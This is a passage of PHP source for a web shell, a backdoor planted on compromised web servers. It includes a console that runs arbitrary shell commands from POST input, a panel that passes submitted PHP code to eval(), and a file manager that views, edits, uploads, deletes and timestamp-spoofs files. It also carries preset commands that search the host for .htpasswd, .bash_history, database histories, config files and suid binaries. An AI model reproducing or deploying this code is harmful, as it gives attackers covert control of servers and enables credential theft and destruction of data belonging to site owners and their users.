  502.         $m = array('Chmod', 'Rename', 'Touch');
  503.     foreach($m as $v)
  504.         echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  505.     echo '<br><br>';
  506.     switch($_POST['p2']) {
  507.         case 'view':
  508.             echo '<pre class=ml1>';
  509.             $fp = @fopen($_POST['p1'], 'r');
  510.             if($fp) {
  511.                 while( !@feof($fp) )
  512.                     echo htmlspecialchars(@fread($fp, 1024));
  513.                 @fclose($fp);
  514.             }
  515.             echo '</pre>';
  516.             break;
  517.         case 'highlight':
  518.             if( @is_readable($_POST['p1']) ) {
  519.                 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  520.                 $oRb = @highlight_file($_POST['p1'],true);
  521.                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$oRb).'</div>';
  522.             }
  523.             break;
  524.         case 'chmod':
  525.             if( !empty($_POST['p3']) ) {
  526.                 $perms = 0;
  527.                 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  528.                     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  529.                 if(!@chmod($_POST['p1'], $perms))
  530.                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  531.             }
  532.             clearstatcache();
  533.             echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="submit"></form>';
  534.             break;
  535.         case 'edit':
  536.             if( !is_writable($_POST['p1'])) {
  537.                 echo 'File isn\'t writeable';
  538.                 break;
  539.             }
  540.             if( !empty($_POST['p3']) ) {
  541.                 $time = @filemtime($_POST['p1']);
  542.                 $_POST['p3'] = substr($_POST['p3'],1);
  543.                 $fp = @fopen($_POST['p1'],"w");
  544.                 if($fp) {
  545.                     @fwrite($fp,$_POST['p3']);
  546.                     @fclose($fp);
  547.                     echo 'Saved!<br><script>p3_="";</script>';
  548.                     @touch($_POST['p1'],$time,$time);
  549.                 }
  550.             }
  551.             echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
  552.             $fp = @fopen($_POST['p1'], 'r');
  553.             if($fp) {
  554.                 while( !@feof($fp) )
  555.                     echo htmlspecialchars(@fread($fp, 1024));
  556.                 @fclose($fp);
  557.             }
  558.             echo '</textarea><input type=submit value="submit"></form>';
  559.             break;
  560.         case 'hexdump':
  561.             $c = @file_get_contents($_POST['p1']);
  562.             $n = 0;
  563.             $h = array('00000000<br>','','');
  564.             $len = strlen($c);
  565.             for ($i=0; $i<$len; ++$i) {
  566.                 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  567.                 switch ( ord($c[$i]) ) {
  568.                     case 0:  $h[2] .= ' '; break;
  569.                     case 9:  $h[2] .= ' '; break;
  570.                     case 10: $h[2] .= ' '; break;
  571.                     case 13: $h[2] .= ' '; break;
  572.                     default: $h[2] .= $c[$i]; break;
  573.                 }
  574.                 $n++;
  575.                 if ($n == 32) {
  576.                     $n = 0;
  577.                     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  578.                     $h[1] .= '<br>';
  579.                     $h[2] .= "\n";
  580.                 }
  581.             }
  582.             echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#12151d><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#12151d><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  583.             break;
  584.         case 'rename':
  585.             if( !empty($_POST['p3']) ) {
  586.                 if(!@rename($_POST['p1'], $_POST['p3']))
  587.                     echo 'Can\'t rename!<br>';
  588.                 else
  589.                     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  590.             }
  591.             echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="submit"></form>';
  592.             break;
  593.         case 'touch':
  594.             if( !empty($_POST['p3']) ) {
  595.                 $time = strtotime($_POST['p3']);
  596.                 if($time) {
  597.                     if(!touch($_POST['p1'],$time,$time))
  598.                         echo 'Fail!';
  599.                     else
  600.                         echo 'Touched!';
  601.                 } else echo 'Bad time format!';
  602.             }
  603.             clearstatcache();
  604.             echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="submit"></form>';
  605.             break;
  606.         /* (С) 12.2015 mitryz */
  607.         case 'frame':
  608.             $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));
  609.             if ($frameSrc[0] != '/')
  610.                 $frameSrc = '/' . $frameSrc;
  611.             if ($frameSrc[strlen($frameSrc) - 1] != '/')
  612.                 $frameSrc = $frameSrc . '/';
  613.             $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
  614.             echo '<iframe width="100%" height="900px" scrolling="no" src='.$frameSrc.' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';
  615.             break;
  616.     }
  617.     echo '</div>';
  618.     hardFooter();
  619. }
  620. if($os == 'win')
  621.     $aliases = array(
  622.         "List Directory" => "dir",
  623.         "Find index.php in current dir" => "dir /s /w /b index.php",
  624.         "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  625.         "Show active connections" => "netstat -an",
  626.         "Show running services" => "net start",
  627.         "User accounts" => "net user",
  628.         "Show computers" => "net view",
  629.         "ARP Table" => "arp -a",
  630.         "IP Configuration" => "ipconfig /all"
  631.     );
  632. else
  633.     $aliases = array(
  634.         "List dir" => "ls -lha",
  635.         "list file attributes on a Linux second extended file system" => "lsattr -va",
  636.         "show opened ports" => "netstat -an | grep -i listen",
  637.         "process status" => "ps aux",
  638.         "Find" => "",
  639.         "find all suid files" => "find / -type f -perm -04000 -ls",
  640.         "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  641.         "find all sgid files" => "find / -type f -perm -02000 -ls",
  642.         "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  643.         "find config.inc.php files" => "find / -type f -name config.inc.php",
  644.         "find config* files" => "find / -type f -name \"config*\"",
  645.         "find config* files in current dir" => "find . -type f -name \"config*\"",
  646.         "find all writable folders and files" => "find / -perm -2 -ls",
  647.         "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  648.         "find all service.pwd files" => "find / -type f -name service.pwd",
  649.         "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  650.         "find all .htpasswd files" => "find / -type f -name .htpasswd",
  651.         "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  652.         "find all .bash_history files" => "find / -type f -name .bash_history",
  653.         "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  654.         "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  655.         "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  656.         "Locate" => "",
  657.         "locate httpd.conf files" => "locate httpd.conf",
  658.         "locate vhosts.conf files" => "locate vhosts.conf",
  659.         "locate proftpd.conf files" => "locate proftpd.conf",
  660.         "locate psybnc.conf files" => "locate psybnc.conf",
  661.         "locate my.conf files" => "locate my.conf",
  662.         "locate admin.php files" =>"locate admin.php",
  663.         "locate cfg.php files" => "locate cfg.php",
  664.         "locate conf.php files" => "locate conf.php",
  665.         "locate config.dat files" => "locate config.dat",
  666.         "locate config.php files" => "locate config.php",
  667.         "locate config.inc files" => "locate config.inc",
  668.         "locate config.inc.php" => "locate config.inc.php",
  669.         "locate config.default.php files" => "locate config.default.php",
  670.         "locate config* files " => "locate config",
  671.         "locate .conf files"=>"locate '.conf'",
  672.         "locate .pwd files" => "locate '.pwd'",
  673.         "locate .sql files" => "locate '.sql'",
  674.         "locate .htpasswd files" => "locate '.htpasswd'",
  675.         "locate .bash_history files" => "locate '.bash_history'",
  676.         "locate .mysql_history files" => "locate '.mysql_history'",
  677.         "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  678.         "locate backup files" => "locate backup",
  679.         "locate dump files" => "locate dump",
  680.         "locate priv files" => "locate priv"
  681.     );
  682. function actionConsole() {
  683.     if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
  684.         prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
  685.         $_POST['p1'] .= ' 2>&1';
  686.     } elseif(!empty($_POST['p1']))
  687.         prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
  688.     if(isset($_POST['ajax'])) {
  689.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  690.         ob_start();
  691.         echo "d.cf.cmd.value='';\n";
  692.         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
  693.         if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  694.             if(@chdir($match[1])) {
  695.                 $GLOBALS['cwd'] = @getcwd();
  696.                 echo "c_='".$GLOBALS['cwd']."';";
  697.             }
  698.         }
  699.         echo "d.cf.output.value+='".$temp."';";
  700.         echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
  701.         $temp = ob_get_clean();
  702.         echo strlen($temp), "\n", $temp;
  703.         exit;
  704.     }
  705.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  706.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  707.     hardHeader();
  708.     echo "<script>
  709. if(window.Event) window.captureEvents(Event.KEYDOWN);
  710. var cmds = new Array('');
  711. var cur = 0;
  712. function kp(e) {
  713.     var n = (window.Event) ? e.which : e.keyCode;
  714.     if(n == 38) {
  715.         cur--;
  716.         if(cur>=0)
  717.             document.cf.cmd.value = cmds[cur];
  718.         else
  719.             cur++;
  720.     } else if(n == 40) {
  721.         cur++;
  722.         if(cur < cmds.length)
  723.             document.cf.cmd.value = cmds[cur];
  724.         else
  725.             cur--;
  726.     }
  727. }
  728. function add(cmd) {
  729.     cmds.pop();
  730.     cmds.push(cmd);
  731.     cmds.push('');
  732.     cur = cmds.length-1;
  733. }
  734. </script>
  735. ";
  736.     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>';
  737.     foreach($GLOBALS['aliases'] as $n => $v) {
  738.         if($v == '') {
  739.             echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  740.             continue;
  741.         }
  742.         echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  743.     }
  744.    
  745.     echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>';
  746.     if(!empty($_POST['p1'])) {
  747.         echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  748.     }
  749.     echo '</textarea><table class=main cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="width:100%;" onkeydown="kp(event);"></td></tr></table>';
  750.     echo '</form></div><script>d.cf.cmd.focus();</script>';
  751.     hardFooter();
  752. }
  753. function actionPhp() {
  754.     if( isset($_POST['ajax']) ) {
  755.         $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  756.         ob_start();
  757.         eval($_POST['p1']);
  758.         $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  759.         echo strlen($temp), "\n", $temp;
  760.         exit;
  761.     }
  762.     hardHeader();
  763.     if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
  764.         echo '<h1>PHP info</h1><div class=content>';
  765.         ob_start();
  766.         phpinfo();
  767.         $tmp = ob_get_clean();
  768.         $tmp = preg_replace('!body {.*}!msiU','',$tmp);
  769.         $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
  770.         $tmp = preg_replace('!h1!msiU','h2',$tmp);
  771.         $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  772.         $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
  773.         echo $tmp;
  774.         echo '</div><br>';
  775.     }
  776.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  777.         $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  778.         echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
  779.     echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  780.     if(!empty($_POST['p1'])) {
  781.         ob_start();
  782.         eval($_POST['p1']);
  783.         echo htmlspecialchars(ob_get_clean());
  784.     }
  785.     echo '</pre></div>';
  786.     hardFooter();
  787. }
  788. function actionFilesMan() {
  789.     if (!empty ($_COOKIE['f']))
  790.         $_COOKIE['f'] = @unserialize($_COOKIE['f']);
  791.    
  792.     if(!empty($_POST['p1'])) {
  793.         switch($_POST['p1']) {
  794.             case 'uploadFile':
  795.                 if ( is_array($_FILES['f']['tmp_name']) ) {
  796.                     foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
  797.                         if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
  798.                                 echo "Can't upload file!";
  799.                             }
  800.                         }
  801.                     }
  802.                 break;
  803.             case 'mkdir':
  804.                 if(!@mkdir($_POST['p2']))
  805.                     echo "Can't create new dir";
  806.                 break;
  807.             case 'delete':
  808.                 function deleteDir($path) {
  809.                     $path = (substr($path,-1)=='/') ? $path:$path.'/';
  810.                     $dh  = opendir($path);
  811.                     while ( ($microsoft = readdir($dh) ) !== false) {
  812.                         $microsoft = $path.$microsoft;
  813.                         if ( (basename($microsoft) == "..") || (basename($microsoft) == ".") )
  814.                             continue;
  815.                         $type = filetype($microsoft);
  816.                         if ($type == "dir")
  817.                             deleteDir($microsoft);
  818.                         else
  819.                             @unlink($microsoft);
  820.                     }
  821.                     closedir($dh);
  822.                     @rmdir($path);
  823.                 }
  824.                 if(is_array(@$_POST['f']))
  825.                     foreach($_POST['f'] as $f) {
  826.                         if($f == '..')
  827.                             continue;
  828.                         $f = urldecode($f);
  829.                         if(is_dir($f))
  830.                             deleteDir($f);
  831.                         else
  832.                             @unlink($f);
  833.                     }
  834.                 break;
  835.             case 'paste':
  836.                 if($_COOKIE['act'] == 'copy') {
  837.                     function copy_paste($c,$s,$d){
  838.                         if(is_dir($c.$s)){
  839.                             mkdir($d.$s);
  840.                             $h = @opendir($c.$s);
  841.                             while (($f = @readdir($h)) !== false)
  842.                                 if (($f != ".") and ($f != ".."))
  843.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  844.                         } elseif(is_file($c.$s))
  845.                             @copy($c.$s, $d.$s);
  846.                     }
  847.                     foreach($_COOKIE['f'] as $f)
  848.                         copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
  849.                 } elseif($_COOKIE['act'] == 'move') {
  850.                     function move_paste($c,$s,$d){
  851.                         if(is_dir($c.$s)){
  852.                             mkdir($d.$s);
  853.                             $h = @opendir($c.$s);
  854.                             while (($f = @readdir($h)) !== false)
  855.                                 if (($f != ".") and ($f != ".."))
  856.                                     copy_paste($c.$s.'/',$f, $d.$s.'/');
  857.                         } elseif(@is_file($c.$s))
  858.                             @copy($c.$s, $d.$s);
  859.                     }
  860.                     foreach($_COOKIE['f'] as $f)
  861.                         @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
  862.                 } elseif($_COOKIE['act'] == 'zip') {
  863.                     if(class_exists('ZipArchive')) {
  864.                         $zip = new ZipArchive();
  865.                         if ($zip->open($_POST['p2'], 1)) {
  866.                             chdir($_COOKIE['c']);
  867.                             foreach($_COOKIE['f'] as $f) {
  868.                                 if($f == '..')
  869.                                     continue;
  870.                                 if(@is_file($_COOKIE['c'].$f))
  871.                                     $zip->addFile($_COOKIE['c'].$f, $f);
  872.                                 elseif(@is_dir($_COOKIE['c'].$f)) {
  873.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
  874.                                     foreach ($iterator as $key=>$value) {
  875.                                         $zip->addFile(realpath($key), $key);
  876.                                     }
  877.                                 }
  878.                             }
  879.                             chdir($GLOBALS['cwd']);
  880.                             $zip->close();
  881.                         }
  882.                     }
  883.                 } elseif($_COOKIE['act'] == 'unzip') {
  884.                     if(class_exists('ZipArchive')) {
  885.                         $zip = new ZipArchive();
  886.                         foreach($_COOKIE['f'] as $f) {
  887.                             if($zip->open($_COOKIE['c'].$f)) {
  888.                                 $zip->extractTo($GLOBALS['cwd']);
  889.                                 $zip->close();
  890.                             }
  891.                         }
  892.                     }
  893.                 } elseif($_COOKIE['act'] == 'tar') {
  894.                     chdir($_COOKIE['c']);
  895.                     $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
  896.                     ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
  897.                     chdir($GLOBALS['cwd']);
  898.                 }
  899.                 unset($_COOKIE['f']);
  900.                 setcookie('f', '', time() - 3600);
  901.                 break;
  902.             default:
  903.                 if(!empty($_POST['p1'])) {
  904.                     prototype('act', $_POST['p1']);
  905.                     prototype('f', serialize(@$_POST['f']));
  906.                     prototype('c', @$_POST['c']);
  907.                 }
  908.                 break;
  909.         }
  910.     }
  911.     hardHeader();
  912.     echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
  913.     $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  914.     if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
  915.     global $sort;
  916.     $sort = array('name', 1);
  917.     if(!empty($_POST['p1'])) {
  918.         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  919.             $sort = array($match[1], (int)$match[2]);
  920.     }
  921. echo "<script>
  922.     function sa() {
  923.         for(i=0;i<d.files.elements.length;i++)
  924.             if(d.files.elements[i].type == 'checkbox')
  925.                 d.files.elements[i].checked = d.files.elements[0].checked;
  926.     }
  927. </script>
  928. <table class='fm main' cellspacing='0' cellpadding='2'>
  929. <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  930.     $dirs = $files = array();
  931.     $n = count($dirContent);
  932.     for($i=0;$i<$n;$i++) {
  933.         $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  934.         $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  935.         $tmp = array('name' => $dirContent[$i],
  936.                      'path' => $GLOBALS['cwd'].$dirContent[$i],
  937.                      'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
  938.                      'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
  939.                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  940.                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  941.                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  942.                     );
  943.         if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
  944.             $files[] = array_merge($tmp, array('type' => 'file'));
  945.         elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
  946.             $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  947.         elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != "."))
  948.             $dirs[] = array_merge($tmp, array('type' => 'dir'));
  949.     }
  950.     $GLOBALS['sort'] = $sort;
  951.     function cmp($a, $b) {
  952.         if($GLOBALS['sort'][0] != 'size')
  953.             return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  954.         else
  955.             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  956.     }
  957.     usort($files, "cmp");
  958.     usort($dirs, "cmp");
  959.     $files = array_merge($dirs, $files);
  960.     $l = 0;
  961.     foreach($files as $f) {
  962.         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  963.             .'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  964.         $l = $l?0:1;
  965.     }
  966.     echo "<tr id=fak><td colspan=7>
  967.     <input type=hidden name=ne value=''>
  968.     <input type=hidden name=a value='FilesMan'>
  969.     <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  970.     <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
  971.     <label><select name='p1'>";
  972.     if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
  973.         echo "<option value='paste'>↳ Paste</option>";
  974.     echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
  975.     if(class_exists('ZipArchive'))
  976.         echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
  977.     echo "<option value='tar'>+ tar.gz</option>";
  978.     echo "</select></label>";
  979.     if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
  980.         echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
  981.     echo "<input type='submit' value='submit'></td></tr></form></table></div>";
  982.     hardFooter();
  983. }
  984. function actionStringTools() {
  985.     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  986.     if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
  987.     if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  988.     if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
  989.     if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  990.     $stringTools = array(
  991.         'Base64 encode' => 'base64_encode',
  992.         'Base64 decode' => 'base64_decode',
  993.         'Url encode' => 'urlencode',
  994.         'Url decode' => 'urldecode',
  995.         'Full urlencode' => 'full_urlencode',
  996.         'md5 hash' => 'md5',
  997.         'sha1 hash' => 'sha1',
  998.         'crypt' => 'crypt',
  999.         'CRC32' => 'crc32',
  1000.         'ASCII to HEX' => 'ascii2hex',
  1001.         'HEX to ASCII' => 'hex2ascii',
  1002.         'HEX to DEC' => 'hexdec',
  1003.         'HEX to BIN' => 'hex2bin',
  1004.         'DEC to HEX' => 'dechex',
  1005.         'DEC to BIN' => 'decbin',
  1006.         'BIN to HEX' => 'binhex',
  1007.         'BIN to DEC' => 'bindec',
  1008.         'String to lower case' => 'strtolower',
  1009.         'String to upper case' => 'strtoupper',
  1010.         'Htmlspecialchars' => 'htmlspecialchars',
  1011.         'String length' => 'strlen',
  1012.     );
  1013.     if(isset($_POST['ajax'])) {
  1014.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
  1015.         ob_start();
  1016.         if(in_array($_POST['p1'], $stringTools))
  1017.             echo $_POST['p1']($_POST['p2']);
  1018.         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  1019.         echo strlen($temp), "\n", $temp;
  1020.         exit;
  1021.     }
  1022.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1023.         prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  1024.     hardHeader();
  1025.     echo '<h1>String conversions</h1><div class=content>';
  1026.     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";
  1027.     foreach($stringTools as $k => $v)
  1028.         echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  1029.         echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  1030.     if(!empty($_POST['p1'])) {
  1031.         if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
  1032.     }
  1033.     echo"</pre></div><br><h1>Search files:</h1><div class=content>
  1034.         <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
  1035.             <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
  1036.             <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
  1037.             <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
  1038.             <tr><td></td><td><input type='submit' value='submit'></td></tr>
  1039.             </table></form>";
  1040.     function hardRecursiveGlob($path) {
  1041.         if(substr($path, -1) != '/')
  1042.             $path.='/';
  1043.         $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
  1044.         if(is_array($paths)&&@count($paths)) {
  1045.             foreach($paths as $microsoft) {
  1046.                 if(@is_dir($microsoft)){
  1047.                     if($path!=$microsoft)
  1048.                         hardRecursiveGlob($microsoft);
  1049.                 } else {
  1050.                     if(empty($_POST['p2']) || @strpos(file_get_contents($microsoft), $_POST['p2'])!==false)
  1051.                         echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($microsoft)."\", \"view\",\"\")'>".htmlspecialchars($microsoft)."</a><br>";
  1052.                 }
  1053.             }
  1054.         }
  1055.     }
  1056.     if(@$_POST['p3'])
  1057.         hardRecursiveGlob($_POST['c']);
  1058.     echo "</div><br><h1>Search for hash:</h1><div class=content>
